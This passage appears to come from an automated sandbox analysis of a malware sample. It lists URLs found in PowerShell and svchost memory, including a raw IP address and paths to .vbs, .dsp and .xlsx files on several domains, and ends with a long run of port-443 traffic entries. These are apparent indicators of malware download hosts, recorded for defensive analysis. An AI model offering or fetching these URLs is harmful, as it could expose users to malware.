                        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                        Source: powershell.exe, 0000000A.00000002.2391880163.00000157CAC64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft~
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D26EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
                        Source: powershell.exe, 00000002.00000002.3648154582.00000297E0EE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3505876743.00000297D2770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3648154582.00000297E0DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D2315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CE5AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pts.group
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D0D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CC941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2677840945.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D26EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D2315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pts.group
                        Source: svchost.exeString found in binary or memory: https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D0D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CC941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000010.00000002.2677840945.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CD4F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000002.00000002.3648154582.00000297E0EE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3505876743.00000297D2770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3648154582.00000297E0DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CE5A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pts.group
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CE0E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2677840945.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pts.group/ab/Laney.dsp
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D2344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D2344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List
                        Source: powershell.exe, 00000002.00000002.3498011411.00000297CEF10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3505876743.00000297D2344000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/ab/List%20of%20required%20items.xlsx
                        Source: powershell.exe, 00000002.00000002.3505876743.00000297D195D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.pts.group
                        Source: powershell.exe, 00000002.00000002.3498011411.00000297CEF10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pts.group/ab/ab.vbs
                        Source: powershell.exe, 0000000A.00000002.2392651911.00000157CE0E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2677840945.0000000005025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/ab/Laney.dsp
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
